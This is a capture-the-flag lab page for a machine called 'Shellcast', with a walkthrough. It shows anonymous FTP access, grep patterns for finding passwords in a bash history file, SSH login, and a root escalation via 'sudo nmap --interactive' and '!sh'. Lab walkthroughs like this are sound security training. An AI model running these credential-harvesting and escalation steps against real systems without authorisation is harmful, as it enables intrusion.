RatLabs
🐀 0 pts earned

Shellcast

Anonymous FTP grants access to a home directory backup where the sysadmin's bash history was accidentally included — and a password was typed in the clear. SSH right in and let sudo nmap hand you root interactively.

🕐 Launching Soon

Launching in calculating...

Machine may be having trouble (checked 49m ago)
Target IP Log in to reveal
User Flag Pending
Root Flag Pending

Premium

Walkthrough, Tips and Tricks

Walkthrough

Objective

Recover a cleartext credential from a bash history file via FTP and escalate via sudo nmap.

Phase 1: FTP Enumeration

  1. Connect: ftp TARGET, user anonymous, password blank.
  2. List and download all files: mget *
  3. Grep for passwords: grep -iE 'ssh|pass|su ' .bash_history

Phase 2: Foothold

  1. SSH with the recovered credential.
  2. Capture user flag.

Phase 3: sudo nmap

  1. sudo -l(ALL) NOPASSWD: /usr/bin/nmap
  2. Launch interactive mode:
    sudo nmap --interactive
nmap> !sh
  3. Capture root flag.
Tips and Tricks

Tips

  • mget * downloads everything — use prompt off first to skip confirmations.
  • Bash history patterns to grep: su , ssh , mysql -p, sshpass.
  • nmap interactive mode works on versions < 5.21; check with nmap --version.

Community

Community Walkthroughs

No community walkthroughs yet — be the first!

Log in to submit your own walkthrough.